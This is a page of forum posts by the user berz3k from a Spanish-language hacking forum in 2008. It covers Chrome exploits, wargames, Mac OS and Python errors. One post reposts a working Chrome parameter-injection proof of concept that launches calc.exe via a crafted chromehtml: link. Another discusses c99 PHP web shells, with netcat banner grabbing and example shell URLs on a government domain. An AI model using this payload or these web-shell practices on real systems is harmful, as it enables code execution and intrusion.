últimos mensajes de: berz3k

Mostrar Mensajes
Páginas: 1 ... 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [19] 20 21 22 23 24 25 26 27 28 29 30

181	Seguridad Informática / Bugs y Exploits / Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32	en: 3 Enero 2009, 21:09 pm
@Novlucker La gran mayoria estan fixeados (he jugado con todos) excepto este ultimo que he probado sobre vista, vaya; se que es un bug que afecta a XP sp3, tendre que revivir mi vieja laptop . -berz3k.

182	Media / Juegos y Consolas / Re: ¡Nos invaden los juegos de 4K!	en: 31 Diciembre 2008, 04:13 am
Me he bajado algunos, los games en flash y java r0x, -berz3k.

183

Seguridad Informática / Bugs y Exploits / Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32

en: 27 Diciembre 2008, 12:48 pm

Nuevo Exploit 23.12.2008

Vulnerable Systems:
* Chrome version 1.0.154.36

Google Chrome Browser (ChromeHTML://) Remote Parameter Injection
fuente: http://www.milw0rm.com

Código:

<!--
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html

click the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>

No rula en:
Windows Vista SP1, que alguien confirme el bug en XP SP3 con algun PoC

-berz3k.

184	Sistemas Operativos / Mac OS X / Re: Mac OS Leopard 10.5 - DVD 4.7 GB	en: 24 Diciembre 2008, 01:32 am
Me da miedo cambiar a Leopard XDD, estoy contento con mi kernel Darwin 10.5.6, alguna page de las mejoras de Leopard, quien ya lo ha instalado que comente su experiencia tengo una MAC book intel -berz3k.

185	Seguridad Informática / WarZone / Re: Resultados del Torneo de Explotacion de Servidores (WarZone) y ANUNCIO	en: 18 Diciembre 2008, 00:10 am
XDD, supongo no sera el SOLVE del wargame, pues perderia la magia del wargame, vaya que tampoco es un secreto super super private. XD -berz3k.

186	Seguridad Informática / WarZone / Re: Resultados del Torneo de Explotacion de Servidores (WarZone) y ANUNCIO	en: 17 Diciembre 2008, 21:27 pm
No encontre la documentacion de blackngel, deberia estar el Link donde lo mencionas sirdarckcat. PD: Divertido el wargame, con difucultades , se que a muchos no les gusta la explotacion de binarios, pero vaya, con el curro y ademas tener que dormir para llegar a la officina es algo pesado, y cuando uno se queria conectar de madruga el wargame estaba down! FELICIDADES!!! a los ganadores y participantes de este wargame! -berz3k.

187	Seguridad Informática / Nivel Web / Re: Problemas Shell c99 y wamp.	en: 16 Diciembre 2008, 00:39 am
Recuerden verificar bien el PHP sobre Apache con un simple telnet o netcat Código: nc -vvn 1.1.1.1 80 telnet 1.1.1.1 80 Server: Apache / PHP 5.0.4 <- algo asi Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4499 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Para ejecutar en algunos casos es necesio el signo de interrogacion http://presidencia.gob.mx/son-brutos/mishell.txt? http://presidencia.gob.mx/son-bestias/mishell.php? Solo por nombrar algunos ejemplos: -berz3k.

188	Seguridad Informática / WarZone / Re: Torneo de explotacion de servidores	en: 12 Diciembre 2008, 04:02 am
Yo esperaria eso sdc, Con las caidas del server, con el SSH que jamas logre conectar dede consola, el VT100 que no funcionaba correctamente, el shellcode FreeBSD que tuvimos que currarnos XDD en fin muchas cosas... -berz3k.

189

Programación / Scripting / Re: ItMsnProtocol (Project)

en: 12 Diciembre 2008, 01:39 am

Error 1:

Código:

C:\FreezItMsn.py
Traceback (most recent call last):
  File "C:\FreezItMsn.py", line 4, in <module>
    import msnp
ImportError: No module named msnp

Error 2:

Código:

C:\PassItMsn.py
Traceback (most recent call last):
  File "C:\ByPassItMsn.py", line 4, in <module>
    import msnp
ImportError: No module named msnp

No soy experto en Python, pero podras especificar los modulos necesarios para que funcionen tus scripts ?

-berz3k.

190	Seguridad Informática / WarZone / Re: Torneo de explotacion de servidores	en: 10 Diciembre 2008, 21:23 pm
Anon, subir images a i.elhacker.net luego sdc regaña a los que no lo hacen XDD -berz3k.

Páginas: 1 ... 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [19] 20 21 22 23 24 25 26 27 28 29 30